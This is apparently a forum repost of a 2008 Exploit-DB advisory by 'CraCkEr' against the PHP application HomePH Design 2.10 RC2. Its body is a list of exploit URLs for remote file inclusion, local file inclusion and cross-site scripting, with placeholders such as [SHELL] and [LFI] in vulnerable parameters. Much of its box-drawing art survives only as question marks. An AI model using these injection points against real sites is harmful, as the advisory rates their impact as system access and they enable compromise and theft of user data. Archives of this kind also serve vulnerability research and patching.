- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5903
- Проверка EDB
-
- Пройдено
- Автор
- CRACKER
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-2982 cve-2008-2981 cve-2008-2980
- Дата публикации
- 2008-06-22
Код:
???????????????????????????????????????????????????????????????????????????????
?? C r a C k E r ??
?? T H E C R A C K O F E T E R N A L M I G H T ??
??????????????????????????????????????????????????????????????????????????????
????? From The Ashes and Dust Rises An Unimaginable crack.... ?????
??????????????????????????????????????????????????????????????????????????????
?? [ Remote File Include ] [ Local File Include ] [XSS] ??
??????????????????????????????????????????????????????????????????????????????
: Author : CraCkEr : : :
? Group : uNiTeD CraCkiNg ForCE ? ? ?
? Script : HomePH Design 2.10 RC2 ? ? Register Globals : ?
? Download : SourceForge.net ? ? ?
? Method : GET ? ? [?] ON [ ] OFF ?
? Critical : High [????????] ? ? ?
? Impact : System access ? ? ?
? ????????????????????????????????????? ???????????????????????????????????? ?
? DALnet #crackers ??
??????????????????????????????????????????????????????????????????????????????
: :
? Release Notes: ?
? ????????????? ?
? Typically used for remotely exploitable vulnerabilities that can lead to ?
? system compromise. ?
? ?
??????????????????????????????????????????????????????????????????????????????
?? Exploit URL's ??
??????????????????????????????????????????????????????????????????????????????
[RFI]
http://localhost/path/admin/templates/template_thumbnail.php?thumb_template=[SHELL]
[LFI]
http://localhost/path/admin/templates/template_thumbnail.php?thumb_template=[LFI]
http://localhost/path/admin/features/account/account.php?language=[LFI]
http://localhost/path/admin/features/downloads/downloads.php?language=[LFI]
http://localhost/path/admin/features/forum/forum.php?language=[LFI]
http://localhost/path/admin/features/fotogalerie/delete.php?language=[LFI]
http://localhost/path/admin/features/fotogalerie/fotogalerie.php?language=[LFI]
[XSS]
http://localhost/path/admin/features/register/register.php?error_meldung=[XSS]
http://localhost/path/admin/features/memberlist/memberlist.php?feature_language[ueberschrift]=[XSS]
http://localhost/path/admin/features/lostpassword/lostpassword.php?language_array[ueberschrift]=[XSS]
http://localhost/path/admin/features/kalender/eingabe.php?language_feature[titel]=[XSS]
http://localhost/path/admin/features/fotogalerie/eingabe.php?language_feature[bildmenu]=[XSS]
Notes: More files are infected.
?????
??????????????????????????????????????????????????????????????????????????????
Greets:
The_PitBull, Raz0r, iNs, Sad, CwG GeNiuS
??????????????????????????????????????????????????????????????????????????????
?? © CraCkEr 2008 ??
??????????????????????????????????????????????????????????????????????????????
# milw0rm.com [2008-06-22]- Источник
- www.exploit-db.com
